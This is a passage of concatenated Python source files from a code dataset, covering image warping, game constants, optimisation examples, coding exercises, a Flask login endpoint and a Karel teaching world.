'''\r\n print (newx, newy)\r\n print(\"~~~~\")\r\n '''\r\n if (newx < len(im)-1 and newy < len(im[0])-1):\r\n newim[r][c] = im[newx][newy]\r\n else:\r\n newim[r][c] = im[0][0]\r\nscipy.misc.imsave('warped.jpg', newim)\r\nimshow(newim)\r\n ","sub_path":"Python/Lab_3/imagewarping.py","file_name":"imagewarping.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"570405796","text":"from MW_datatypes import *\n\ngamemode = 1\nisFull = 1\nlightingmode = 0\n\nif isFull:\n DISPLAY_FLAGS = pygame.HWSURFACE|pygame.DOUBLEBUF|pygame.FULLSCREEN\nelse:\n DISPLAY_FLAGS = pygame.HWSURFACE|pygame.DOUBLEBUF\nif gamemode == 1:\n SCREEN_SIZE = WIDTH, HEIGHT = 640,480\n LIGHTING = 1\n CAMERA_MODE = \"force\"\nelif gamemode == 2:\n SCREEN_SIZE = WIDTH, HEIGHT = 1200,800\n LIGHTING = 0\n CAMERA_MODE = \"nothing\"\nelif gamemode == 3:\n SCREEN_SIZE = WIDTH, HEIGHT = 800,600\n LIGHTING = 0\n CAMERA_MODE = \"nothing\"\nelif gamemode == 4:\n SCREEN_SIZE = WIDTH, HEIGHT = 1200,800\n LIGHTING = 0\n CAMERA_MODE = \"force\"\n\nFRAMERATE = 25\nMSPERFRAME = 1000/FRAMERATE\nTILING_SIZE = Vector2d(20,20)\n\n\n#colors\nCOLOR_RED = 255,0,0\nCOLOR_WHITE = 255,255,255\nCOLOR_LIGHT_BLUE = 127,127,255\nCOLOR_BLACK = 0,0,0\nCOLOR_GREEN = 0,255,0\nCOLOR_DARK = 100,100,100\nCOLOR_KEY = COLOR_BLACK\n\n#game constants\nTORCH_RADIUS = 100,150\nPLAYER_LIGHT_RADIUS = 50,75\n\nMAN_START = Vector2d(-540,-40)\nWOMAN_START = Vector2d(-780,-40)\n#MAN_START = Vector2d(600,1640)\n#WOMAN_START = Vector2d(0,1280)\n#MAN_START = Vector2d(1300,1920) #exit\n#WOMAN_START = Vector2d(-320,840)\n#MAN_START = Vector2d(760,740)\n#MAN_START = Vector2d(520,1280)\n\nSHADOW_LADY_START = Vector2d(120,-300)\n\n#engine constants\ndirMap = dict()\ndirMap[\"RIGHT\"] = 1\ndirMap[\"LEFT\"] = -1\n\n\ndef blankfcn(arg01 = None, arg02 = None):\n pass\n","sub_path":"src/MW_constants.py","file_name":"MW_constants.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"124592805","text":"from gekko import GEKKO\n\nm = GEKKO() # create GEKKO model\n\nprint('--------- Follow local path to view files --------------')\nprint(m.path) # show source file path\nprint('--------------------------------------------------------')\n\n# test application\nu = m.FV(value=5, name='u') # define fixed value\nx = m.SV(name='state') # define state variable\nm.Equation(x == u) # define equation\nm.options.COLDSTART = 1 # coldstart option\nm.options.DIAGLEVEL = 0 # diagnostic level (0-10)\nm.options.MAX_ITER = 500 # adjust maximum iterations\nm.options.SENSITIVITY = 1 # sensitivity analysis\nm.options.SOLVER = 1 # change solver (1=APOPT,3=IPOPT)\nm.solve(disp=True) # solve locally (remote=False)\nprint('x: ' + str(x.value)) # print variable value\n","sub_path":"Week1/Gekko Examples/18_debugging_resources.py","file_name":"18_debugging_resources.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"6556517","text":"import re\nimport collections\nfrom collections import Counter\nimport jieba\n\ndef stats_text_ch(text):\n cut_list = []\n word_list = []\n count_list = []\n\n ch_pattern = re.compile(r'[\\u4e00-\\u9fa5]')\n text_ch = re.findall(ch_pattern,text)\n\n text_cut = ''.join(text_ch) #把筛选返回的list转为str\n\n cut_list = jieba.cut(text_cut,cut_all=False) #使用jieba精准模式分词\n\n for word in cut_list:\n if len(word)>=2:\n word_list.append(word)\n count_list=Counter(word_list).most_common(20)\n return count_list\n\n\n ","sub_path":"19100401/haijun-zhang/d10/mymodule/stats_word.py","file_name":"stats_word.py","file_ext":"py","file_size_in_byte":636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"599836310","text":"import problem\n\n\nclass Six(problem.Problem):\n\n def __init__(self):\n super(Six, self).__init__(\n 6,\n \"\"\"\n The sum of the squares of the first ten natural numbers is,\n\n 1**2 + 2**2 + ... + 10**2 = 385\n The square of the sum of the first ten natural numbers is,\n\n (1 + 2 + ... + 10)**2 = 55**2 = 3025\n Hence the difference between the sum of the squares\n of the first ten natural numbers and the square of the sum is 3025 − 385 = 2640.\n\n Find the difference between the sum of the squares\n of the first one hundred natural numbers and the square of the sum.\n \"\"\",\n 25164150)\n\n def calculate_answer(self):\n square_of_sum = 0\n\n for i in range(1, 101):\n square_of_sum += i\n\n square_of_sum **= 2\n\n return square_of_sum - self.sum_of_squares(100)\n\n def sum_of_squares(self, number):\n if number is 0:\n return 0\n return number ** 2 + self.sum_of_squares(number - 1)","sub_path":"problems/six.py","file_name":"six.py","file_ext":"py","file_size_in_byte":1101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"553660516","text":"__author__ = 'ashabou'\n\nimport argparse\nimport os\nimport glob\nimport time\nimport logging\nimport json\n\nimport pandas as pd\nimport numpy as np\n\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.externals import joblib\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import Normalizer\nfrom lib import deeplearning\n\nfrom lib import descriptors\n\n\nlogging.basicConfig(level=0)\nlogger = logging.getLogger('TRAIN')\n\ndescriptors = {name.replace(\"DESC_\", \"\"): descriptor for name, descriptor in descriptors.__dict__.items() if name.startswith('DESC_')}\nmodels = {\"forest\": RandomForestClassifier, \"svm\": SVC, \"dnn\": deeplearning.DeepLearning}\n\n\nlogger.info(\"possible descriptors %s\" %descriptors)\n\nargument_parser = argparse.ArgumentParser(description='train classifier')\n\nargument_parser.add_argument('--train-dir',\n dest='train_dir',\n type=str,\n default=None,\n help='path to train directory')\n\nargument_parser.add_argument('--model-dir',\n dest='model_dir',\n type=str,\n default=None,\n help='path to the generated model directory')\n\nargument_parser.add_argument('--descriptor',\n dest='descriptor',\n choices=descriptors,\n default=None,\n help='descriptor for image')\n\nargument_parser.add_argument('--model',\n dest='model',\n choices=models,\n default=None,\n help='learning method')\n\nargument_parser.add_argument('--stats',\n dest='stats',\n default=1,\n help='stats infos for debug')\n\nargs = argument_parser.parse_args()\n\nif __name__ == '__main__':\n\n #check args\n logger.debug(\"Check directories...\")\n if not args.train_dir:\n argument_parser.error(\"missing train directory\")\n if not args.model_dir:\n argument_parser.error(\"missing model directory\")\n\n #check output dir\n logger.debug(\"Create new model dir...\")\n if os.path.isdir(args.model_dir):\n new_name = args.model_dir+time.strftime(\"%Y-%m-%d-%H-%M-%S\", time.gmtime())\n logger.debug(\"backup old model-dir in %s\" %new_name )\n os.rename(args.model_dir, new_name )\n os.makedirs(args.model_dir)\n\n #list classes\n list_classes = os.listdir(args.train_dir)\n logger.info(\"classes are : %s\" %list_classes)\n\n #use descriptor\n desc=None\n if args.descriptor:\n desc = descriptors.get(args.descriptor)\n logger.info(\"using descriptor %s\" %args.descriptor)\n else:\n logger.info(\"No descriptor is used\")\n\n #create dataframe\n logger.info(\"create data frame for training...\")\n train_df = pd.DataFrame(columns=[\"path\", \"desc\", \"class\"])\n\n for cls in list_classes:\n list_images_paths = glob.glob(os.path.join(args.train_dir, cls, \"*.*\"))\n for id in xrange(len(list_images_paths)):\n\n descvect=None\n if desc is not None:\n descvect = desc(list_images_paths[id]).run()\n\n train_df.loc[len(train_df)+1] = [list_images_paths[id], str(descvect) , cls]\n\n logger.info(\"save the data frame...\")\n train_df.to_csv(os.path.join(args.model_dir, \"train_df.csv\"),header=False)\n\n\n\n #training model\n ml = models.get(args.model)\n logger.info(\"Model is %s\" %args.model)\n\n #labels\n labels = train_df[\"class\"].as_matrix()\n\n #descriptors if exist\n vectors=None\n norm=None\n if desc:\n def str_column_to_array(df_column):\n lst=[]\n df_column.apply(lambda row: lst.append(np.array([float(elem) for elem in row.strip('[').strip(']').split(\",\")])))\n return lst\n\n vectors = str_column_to_array(train_df[\"desc\"])\n\n norm=\"l1\"\n if norm is not None:\n normalizer = Normalizer(norm)\n vectors = normalizer.fit_transform(vectors)\n\n logger.debug(\"Training...\")\n if desc:\n #taining and ml algo on vectors\n model = ml().fit(vectors, labels)\n else:\n if args.model!=\"dnn\":\n raise NotImplementedError(\"non dnn model is not proposed for direct images\")\n #training raw data only with dnn\n if args.stats:\n model = ml(args.model_dir).fitdata(train_df[\"path\"].tolist(), labels)\n else:\n model = ml().fitdata(train_df[\"path\"].tolist(), labels)\n\n\n logger.info(\"Save model...\")\n os.makedirs(os.path.join(args.model_dir, \"model\"))\n joblib.dump(model, os.path.join(args.model_dir, \"model\", \"model.pkl\"))\n\n with open(os.path.join(args.model_dir,\"model.json\"),'w') as jsonfile:\n json.dump({'descriptor': None if not desc else desc.__name__, 'model': ml.__name__, 'normalizer': norm}, jsonfile)\n","sub_path":"scripts/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":5000,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"326489116","text":"# 给定一个由整数组成的非空数组所表示的非负整数,在该数的基础上加一。 \n# \n# 最高位数字存放在数组的首位, 数组中每个元素只存储单个数字。 \n# \n# 你可以假设除了整数 0 之外,这个整数不会以零开头。 \n# \n# 示例 1: \n# \n# 输入: [1,2,3]\n# 输出: [1,2,4]\n# 解释: 输入数组表示数字 123。\n# \n# \n# 示例 2: \n# \n# 输入: [4,3,2,1]\n# 输出: [4,3,2,2]\n# 解释: 输入数组表示数字 4321。\n# \n# Related Topics 数组\n\n\n# leetcode submit region begin(Prohibit modification and deletion)\nfrom typing import List\n\n\nclass Solution:\n #直接转化为数字加一再转化为数组\n # def plusOne(self, digits: List[int]) -> List[int]:\n # num = 0\n # result = []\n # for index, digist in enumerate(digits):\n # num = num + digist * 10 ** (len(digits) - index - 1)\n # num = num + 1\n # while num:\n # result_index = num % 10\n # num = int(num // int(10))\n # result.append(result_index)\n # result.reverse()\n # return result\n def plusOne(self, digits: List[int]) -> List[int]:\n l = len(digits)\n if l == 0:\n return [1]\n for i in range (l-1, -1, -1):\n if digits[i] != 9:\n digits[i] = digits[i]+1\n return digits\n else:\n digits[i] = 0\n digits.insert(0, 1) #该方法是python内置方法,运行速度很快\n return digits\n\n# leetcode submit region end(Prohibit modification and deletion)\n\nif __name__ == '__main__':\n digist = [9]\n solution = Solution()\n print(solution.plusOne(digist))\n","sub_path":"Week_01/leetcode/editor/cn/[66]加一.py","file_name":"[66]加一.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"490011167","text":"from Class import Animal\r\n\r\ndef menuChoice(nChoices):\r\n\t#used to collect the inputs for menuchoices\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\tchoice = input(\"Choose an alternative: \")\r\n\t\t\tchoice = int(choice)\r\n\t\t\tif choice<=nChoices and choice>0:\r\n\t\t\t\tbreak\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Choose a valid option \")\r\n\t\texcept ValueError:\r\n\t\t\tprint(\"Invalid Input \")\r\n\treturn choice\r\n\r\ndef readFile(fileName):\r\n\t#reads external files and returns the values in the form of a list\r\n\tlist=[]\r\n\twith open(str(fileName)+\".txt\", \"r\") as externalFile:\r\n\t\tfor line in externalFile:\r\n\t\t\tcurrentLine=line.rstrip(\"\\n\")\r\n\t\t\tlist.append(currentLine)\r\n\treturn list\r\n\r\ndef createObjects():\r\n\t#creates all the animal objects from an externally saved file\r\n\tlsInfo=readFile(\"animals\")\r\n\tlist=[]\r\n\tlsObjects=[]\r\n\tfor n in range(len(lsInfo)):\r\n\t\tline=lsInfo[n].split(\", \")\r\n\t\tlist.append(line)\r\n\tfor n in range(len(list)):\r\n\t\tanimal=Animal(list[n][0],list[n][1],int(list[n][2]),list[n][3])\r\n\t\tlsObjects.append(animal)\r\n\treturn lsObjects\r\n\r\n\"\"\"def addAnimal():\r\n\t#menu that creats new animal objects and appends them to the list\r\n\tn=0\r\n\tfor species in lsSpecies:\r\n\t\tn+=1\r\n\t\tprint(\"%s. %s\" % (n,species))\r\n\tspeciesChoice=menuChoice(n)-1\r\n\tprint(\"\"\"\r\n\"\"\"Choose Gender:\r\n1. Male [M]\r\n2. Female [F]\"\"\"\r\n\"\"\")\r\n\tgender=menuChoice(2)\r\n\tif gender==1:\r\n\t\tgender=\"M\"\r\n\tif gender==2:\r\n\t\tgender=\"F\"\r\n\twhile True:\r\n\t\ttry:\r\n\t\t\tage=input(\"Input Age: \")\r\n\t\t\tage=int(age)\r\n\t\t\tbreak\r\n\t\texcept ValueError:\r\n\t\t\tprint(\"Choose a number \")\r\n\tunique=False\r\n\twhile unique==False:\r\n\t\tunique\t=True\r\n\t\tx=int(0)\r\n\t\tname=str(input(\"Choose a name: \")).title()\r\n\t\tfor animal in lsAnimals:\r\n\t\t\tif animal.name!=name:\r\n\t\t\t\tpass\r\n\t\t\telse:\r\n\t\t\t\tprint(\"Choose an unique name \")\r\n\t\t\t\tunique=False\r\n\t\t\r\n\t\t\t\r\n\tanimal=Animal(name, lsSpecies[speciesChoice], age, gender)\r\n\treturn animal\"\"\"\r\n\r\ndef start():\r\n\t#starts the main functions with the values from external files\r\n\tlsSpecies=readFile(\"species\")\r\n\tlsAnimals=createObjects()\r\n\tmaxCap=int(readFile(\"maxCap\")[0])\r\n\tmainMenu(lsSpecies, lsAnimals, maxCap)\r\n\r\ndef saveFile(lsAnimals):\r\n\t#saves the objects in the list in a external file\r\n\twith open(\"animals.txt\", \"w\") as externalFile:\r\n\t\tfor animal in lsAnimals:\r\n\t\t\texternalFile.write(\"%s, %s, %s, %s\\n\" % (animal.name, animal.species, animal.age, animal.gender))\r\n\r\n\r\ndef search(lsAnimals):\r\n\t#search the list with the parameter that the user chooses\r\n\twhile True:\r\n\t\tsearchParameter=str(input('Search or type \"cancel\" to exit: ')).title()\r\n\t\tchosenAnimal=[]\r\n\t\tfor animal in lsAnimals:\r\n\t\t\tif searchParameter==animal.name:\r\n\t\t\t\tchosenAnimal.append(animal)\r\n\t\t\telif searchParameter==animal.age:\r\n\t\t\t\tchosenAnimal.append(animal)\r\n\t\t\telif searchParameter==animal.gender:\r\n\t\t\t\tchosenAnimal.append(animal)\r\n\t\t\telif searchParameter==animal.species:\r\n\t\t\t\tchosenAnimal.append(animal)\r\n\t\t\telse:\r\n\t\t\t\tpass\r\n\t\tif searchParameter==\"Cancel\":\r\n\t\t\tbreak\r\n\t\telif chosenAnimal==[]:\r\n\t\t\tprint(\"The animal doesn´t exist, try again \")\r\n\t\telse:\r\n\t\t\tbreak\r\n\treturn chosenAnimal\r\n\r\ndef overviewMenu(lsAnimals, ascending):\r\n\t#the menu which the user chooses parameter to sort by\r\n\twhile True:\r\n\t\tprint(\"\"\"\r\nSort by:\r\n1. Name\r\n2. Age\r\n3. Gender\r\n4. Species\r\n\r\n5. Previous Menu\"\"\")\r\n\r\n\t\tchoice=menuChoice(5)\r\n\t\tif choice==1:\r\n\t\t\tprintOverview(lsAnimals, \"name\", ascending)\r\n\t\telif choice==2:\r\n\t\t\tprintOverview(lsAnimals, \"age\", ascending)\r\n\t\telif choice==3:\r\n\t\t\tprintOverview(lsAnimals, \"gender\", ascending)\r\n\t\telif choice==4:\r\n\t\t\tprintOverview(lsAnimals, \"species\", ascending)\r\n\t\telif choice==5:\r\n\t\t\tbreak\r\n\treturn lsAnimals\r\n\r\n\r\n\"\"\"def printOverview(lsAnimals, searchParameter=\"name\", ascending=False):\r\n\t#prints all the animals in a userchosen order\r\n\tsortedList=sorted(lsAnimals, key=lambda animal: getattr(animal, searchParameter), reverse=ascending)\r\n\tif searchParameter==\"name\" or searchParameter==\"age\":\r\n\t\tfor n in range(len(sortedList)):\r\n\t\t\tanimal=sortedList[n]\r\n\t\t\tprint(\"%s) %s (%s, %s y/o, %s)\" % (n+1, animal.name, animal.species, animal.age, animal.gender))\r\n\telif searchParameter==\"gender\" or searchParameter==\"species\":\r\n\t\tlsCategories=[]\r\n\t\tfor animal in sortedList:\r\n\t\t\tlsCategories.append(getattr(animal, searchParameter))\r\n\t\tuniqueCategories=set(lsCategories)\r\n\t\tfor category in uniqueCategories:\r\n\t\t\tprint(\"\"\"\r\n\"\"\"+str(category)+\"\"\"\"\"\":\"\"\" \"\"\")\r\n\t\t\tfor animal in sortedList:\r\n\t\t\t\tif getattr(animal, searchParameter)==category:\r\n\t\t\t\t\tprint(animal.name)\"\"\"\r\n\r\ndef ascending(lsAnimals):\r\n\t#choose which way you want to sort the list, in ascending or descending order\r\n\twhile True:\r\n\t\tprint(\"\"\"\r\n1. Ascending\r\n2. Descending\r\n\r\n3. Previous Menu\"\"\")\r\n\t\tascending=False\r\n\t\tchoice=menuChoice(3)\r\n\t\tif choice==1:\r\n\t\t\tascending=False\r\n\t\telif choice==2:\r\n\t\t\tascending=True\r\n\t\telif choice==3:\r\n\t\t\tbreak\r\n\t\toverviewMenu(lsAnimals, ascending)\t\r\n\r\n\"\"\"def removeAnimal(lsAnimals):\r\n\t#prints the list of animals and lets the user choose an animal to delete, also possible to return to main menu\r\n\tprintOverview(lsAnimals)\r\n\tprint(\"\"\"\r\n\"\"\"%s) Return to Main Menu\"\"\"\r\n\"\"\" % (len(lsAnimals)+1))\r\n\tuserInput=menuChoice(len(lsAnimals)+1)\r\n\tif userInput!=len(lsAnimals)+1:\r\n\t\tanimalToDelete=userInput-1\r\n\t\tlsAnimals.pop(animalToDelete)\r\n\treturn lsAnimals\"\"\"\r\n\r\ndef checkUnique(lsAnimals, argument):\r\n\t#checks if attributes of an object in a list are unique, returns all unique attributes\r\n\toutput=[]\r\n\tseen=set()\r\n\tfor animal in lsAnimals:\r\n\t\tobject=getattr(animal, argument)\r\n\t\tif object not in seen:\r\n\t\t\toutput.append(object)\r\n\t\t\tseen.add(object)\r\n\t\telif object in seen:\r\n\t\t\toutput.remove(object)\r\n\treturn output\r\n\r\n\r\ndef recommendations(lsAnimals, maxCap, lsSpecies):\r\n\t#gives recommendations based on the maxCap and the list\r\n\tif len(lsAnimals)<=maxCap:\r\n\t\tlonelySpecies=[]\r\n\t\tfor species in lsSpecies:\r\n\t\t\tlsGenders=[]\r\n\t\t\tfor animal in lsAnimals:\r\n\t\t\t\tif animal.species==species:\r\n\t\t\t\t\tlsGenders.append(animal.gender)\r\n\t\t\tif len(set(lsGenders))==1:\r\n\t\t\t\tfor gender in lsGenders:\r\n\t\t\t\t\tif gender==\"F\":\r\n\t\t\t\t\t\tlonelySpecies.append(\"%s, M\" %(species))\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tlonelySpecies.append(\"%s, F\" %(species))\r\n\t\tprint(\"You should buy:\")\r\n\t\tcounter=0\r\n\t\tfor object in lonelySpecies:\r\n\t\t\tcounter+=1\r\n\t\t\tprint(\"%s) %s\"%(counter, object))\r\n\r\n\tif len(lsAnimals)>=maxCap:\r\n\t\t#recommendations for deleting animals\r\n\t\tnumberOfAnimalsPerSpecies=[]\r\n\t\ttempList=[]\r\n\t\tfor species in lsSpecies:\r\n\t\t\tspeciesCounter=0\r\n\t\t\tfor animal in lsAnimals:\r\n\t\t\t\tif animal.species==species:\r\n\t\t\t\t\tspeciesCounter+=1\r\n\t\t\t\tnumberOfAnimalsPerSpecies.append(\"*%ss* (You have: %s)\"%(species, speciesCounter))\r\n\t\tfor item in numberOfAnimalsPerSpecies:\r\n\t\t\tif int(item[-2])>2:\r\n\t\t\t\ttempList.append(item)\r\n\t\tprint(\"You could remove some of these animals:\")\r\n\t\tfor item in tempList:\r\n\t\t\tprint(item)\r\n\t\t\t\t\r\ndef mainMenu(lsSpecies, lsAnimals, maxCap):\r\n\t#main menu of the program\r\n\twhile True:\r\n\t\tprint(\"\"\"\r\n1. Add Animal\r\n2. Remove Animals\r\n3. Overview\r\n4. Search\r\n5. Recommendations\r\n\r\n6. Save and Exit\"\"\")\r\n\t\tchoice=menuChoice(6)\r\n\t\tif choice==1:\r\n\t\t\t#Add Animal\r\n\t\t\tif len(lsAnimals) 0 else \"\",\r\n 'recordTime': TimeHelper.formatTime(ret['recordTime']),\r\n # 'roles': roles,\r\n 'userID': ret['userID'],\r\n 'password': \"123456\",\r\n 'username': ret['userName'],\r\n 'menus': d\r\n },\r\n 'rights': 0\r\n }\r\n return json.dumps(result)\r\n elif request.method == 'GET':\r\n userID = request.args.get(\"usernum\")\r\n system = request.args.get(\"name\")\r\n r = PersonManager.getUserByUserID(userID)\r\n if r.Suc and r.Rows > 0:\r\n ret = r.Result[0]\r\n roles = PersonManager.getUserRoles(ret['id'])\r\n ret = PersonManager.getUser(ret['id']).Result[0]\r\n # roles = PersonManager.getUserRoles(254)\r\n # ret = PersonManager.getUser(254).Result[0]\r\n ctrls = []\r\n for role in roles:\r\n keys = RoleManager().getKeysByRoleID(role['id']).Result\r\n for k in keys:\r\n ctrlIDs = KeyManager().getCtrlByKeyID(k['keyID'])\r\n for cID in ctrlIDs.Result:\r\n ctrls.append(ControlManager().get(cID['controlID']).Result[0])\r\n sysMap = []\r\n dataMap = {}\r\n r = []\r\n data = {}\r\n for ctrl in ctrls:\r\n if ctrl['system'] not in sysMap:\r\n sysMap.append(ctrl['system'])\r\n dataMap[ctrl['menuID']] = ctrl['menuID']\r\n system = ctrl['system']\r\n data[system] = [ctrlFormat(ctrl)['id']]\r\n else:\r\n system = ctrl['system']\r\n data[system].append(ctrlFormat(ctrl)['id'])\r\n\r\n d = []\r\n\r\n if system in data.keys():\r\n ids = data[system]\r\n for cID in ids:\r\n rt = ControlManager().getSortBySystem({'system': system, 'id': cID}).Result\r\n if not rt:\r\n continue\r\n rt = rt[0]\r\n rt['menuPercode'] = rt['flag']\r\n rt['menuName'] = rt['name']\r\n rt['menuId'] = rt['menuID']\r\n rt['parentId'] = rt['parentID']\r\n rt['menuState'] = rt['status']\r\n rt['menuUrl'] = rt['detail']\r\n rt.pop(\"flag\", True)\r\n rt.pop(\"parentID\", True)\r\n rt.pop(\"system\", True)\r\n rt.pop(\"status\", True)\r\n rt.pop(\"name\", True)\r\n rt.pop(\"detail\", True)\r\n rt.pop(\"menuID\", True)\r\n rt.pop(\"id\", True)\r\n d.append(rt)\r\n\r\n dep = DepartmentManager.getDepartment(ret['departmentID']).Result\r\n result = {\r\n 'authResult': 1,\r\n 'userInfo': {\r\n 'userName': ret['userName'],\r\n 'loginName': ret['loginName'],\r\n 'gender': formatSex(ret['gender']),\r\n 'department': dep[0]['name'] if len(dep) > 0 else \"\",\r\n 'recordTime': TimeHelper.formatTime(ret['recordTime']),\r\n # 'roles': roles,\r\n 'userID': ret['userID'],\r\n 'password': \"123456\",\r\n 'username': ret['userName'],\r\n 'menus': d\r\n },\r\n 'rights': 0\r\n }\r\n # print(result)\r\n return json.dumps(result)\r\n else:\r\n return jsonify({})\r\n else:\r\n return json.dumps({'status': 1, 'error': '提交数据格式不正确'})\r\n","sub_path":"Blueprint/unlock.py","file_name":"unlock.py","file_ext":"py","file_size_in_byte":8190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"643952149","text":"def DAFScriptMain(config, parameter, returnpacket):\r\n # config: ISysConfig object\r\n # parameter: TPClassUIDataPacket\r\n # returnpacket: TPClassUIDataPacket (undefined structure)\r\n\r\n strSQL = '\\\r\n select max(periode_code) lastyear \\\r\n from AccountingYear'\r\n resSQL = config.CreateSQL(strSQL).RawResult\r\n\r\n if resSQL.lastyear == None:\r\n raise '\\n Tahun terakhir tidak ditemukan.\\n'\r\n\r\n periode_code = resSQL.lastyear\r\n \r\n oAccountingYear = config.CreatePObjImplProxy('AccountingYear')\r\n oAccountingYear.Key = periode_code\r\n if oAccountingYear.Periode_Status == 'A':\r\n raise '\\n Tahun terakhir berstatus aktif.\\n'\r\n\r\n config.BeginTransaction()\r\n try:\r\n\r\n strSQL = '\\\r\n select count(journal_no) countjournal \\\r\n from Journal \\\r\n where fl_accountingyear = \\'%s\\'' \\\r\n % (periode_code)\r\n resSQL = config.CreateSQL(strSQL).RawResult\r\n if resSQL.countjournal > 0:\r\n raise '\\n Tahun telah digunakan oleh salah satu jurnal.\\n'\r\n \r\n strSQLDelAccDay = 'delete from AccountingDay where fl_accountingyear = \\'%s\\'' % (periode_code)\r\n strSQLDelAccPer = 'delete from AccountingPeriode where fl_accountingyear = \\'%s\\'' % (periode_code)\r\n strSQLDelAccYear = 'delete from AccountingYear where periode_code = \\'%s\\'' % (periode_code)\r\n\r\n config.ExecSQL(strSQLDelAccDay)\r\n config.ExecSQL(strSQLDelAccPer)\r\n config.ExecSQL(strSQLDelAccYear)\r\n\r\n config.Commit()\r\n except:\r\n config.Rollback()\r\n raise\r\n\r\n return 1\r\n","sub_path":"scripts/master/delete accyear.py","file_name":"delete accyear.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298686303","text":"# [2019.01.17_문제4_구간합]\n# N개의 숫자 중에 이웃한 3가지의 숫자의 합이 가장 큰 수와 가장 작은 수의 차를 구하라\n\n# [입력]\n# 첫 줄에 테스트 케이스 개수 T가 주어진다. ( 1 ≤ T ≤ 50 )\n# 다음 줄부터 테스트케이스의 첫 줄에 정수의 개수 N과 구간의 개수 M 주어진다. ( 10 ≤ N ≤ 100, 2 ≤ M < N )\n# 다음 줄에 N개의 정수 ai가 주어진다. ( 1 ≤ a ≤ 10000 )\n\n# [출력]\n# 각 줄마다 \"#T\" (T는 테스트 케이스 번호)를 출력한 뒤, 답을 출력한다.\n\n###### 구간 M개의 합들의 list를 만들고 거기서 min max 골라서 차를 구한다 ######\n###### 숫자의 크기 순으로 나열한 뒤에 앞에 세개 뒤에 세개 ######\n\nimport sys\nsys.stdin = open('구간합_input.txt','r')\n\nT = int(input())\n\nfor test_case in range(1,T+1):\n \n p = list(map(int,input().split()))\n num = list(map(int,input().split()))\n n,m = p[0],p[1]\n min_result = sum(num[:m])\n max_result = sum(num[:m])\n\n for i in range(1,n-m+1):\n if min_result > sum(num[i:m+i]):\n min_result = sum(num[i:m+i])\n if max_result < sum(num[i:m+i]):\n max_result = sum(num[i:m+i])\n\n print(f'#{test_case} {max_result - min_result}')\n","sub_path":"Algorithm/19.01/190117/sw_sol4_구간합.py","file_name":"sw_sol4_구간합.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"8592632","text":"\"\"\"\nThis file defines the class definition of a Karel world.\n\nThe sub header comment defines important notes about the Karel\nworld file format. \n\nOriginal Author: Nicholas Bowman\nCredits: Kylie Jue \nLicense: MIT\nVersion: 1.0.0\nEmail: nbowman@stanford.edu\nDate of Creation: 10/1/2019\nLast Modified: 3/31/2020\n\"\"\"\n\n\"\"\"\nGeneral Notes About World Construction \n- Streets run EAST-WEST (rows)\n- Avenues run NORTH-SOUTH (columns)\n\nWorld File Constraints:\n- World file should specify one component per line in the format\n KEYWORD: PARAMETERS\n- Any lines with no colon delimiter will be ignored\n- The accepted KEYWORD, PARAMETER combinations are as follows:\n\t- Dimension: (num_avenues, num_streets)\n\t- Wall: (avenue, street); direction\n\t- Beeper: (avenue, street) count\n\t- Karel: (avenue, street); direction\n\t- Color: (avenue, street); color\n\t- Speed: delay\n\t- BeeperBag: num_beepers\n- Multiple parameter values for the same keyword should be separated by a semicolon\n- All numerical values (except delay) must be expressed as ints. The exception\n to this is that the number of beepers can also be INFINITY\n- Any specified color values must be valid TKinter color strings, and are limited\n to the set of colors \n- Direction is case-insensitive and can be one of the following values:\n\t- East\n\t- West\n\t- North \n\t- South\t\n\"\"\"\n\nfrom karel.kareldefinitions import *\nimport collections\nimport re\nimport copy\n\nclass KarelWorld():\n\tdef __init__(self, world_file=None):\n\t\t\"\"\"\n\t\tKarel World constructor\n\t\tParameters:\n\t\t\tworld_file: Open file object containing information about the initial state of Karel's world\n\t\t\"\"\"\n\t\tself._world_file = world_file\n\n\t\t# Map of beeper locations to the count of beepers at that location\n\t\tself._beepers = collections.defaultdict(int)\n\n\t\t# Map of corner colors, defaults to None\n\t\tself._corner_colors = collections.defaultdict(lambda: \"\")\n\n\t\t# Set of Wall objects placed in the world\n\t\tself._walls = set()\n\n\t\t# Dimensions of the world\n\t\tself._num_streets = 1\n\t\tself._num_avenues = 1\n\n\t\t# Initial Karel state saved to enable world reset\n\t\tself._karel_starting_location = (1, 1)\n\t\tself._karel_starting_direction = Direction.EAST\n\t\tself._karel_starting_beeper_count = 0\n\n\t\t# Initial speed slider setting\n\t\tself._init_speed = INIT_SPEED\n\n\t\t# If a world file has been specified, load world details from the file\n\t\tif self._world_file:\n\t\t\tself.load_from_file()\n\n\t\t# Save initial beeper state to enable world reset\n\t\tself._init_beepers = copy.deepcopy(self._beepers)\n\n\t@property\n\tdef karel_starting_location(self):\n\t\treturn self._karel_starting_location\n\n\t@property\n\tdef karel_starting_direction(self):\n\t\treturn self._karel_starting_direction\n\n\t@property\n\tdef karel_starting_beeper_count(self):\n\t\treturn self._karel_starting_beeper_count\n\t\n\t@property\n\tdef init_speed(self):\n\t\treturn self._init_speed\n\n\t@property\n\tdef num_streets(self):\n\t\treturn 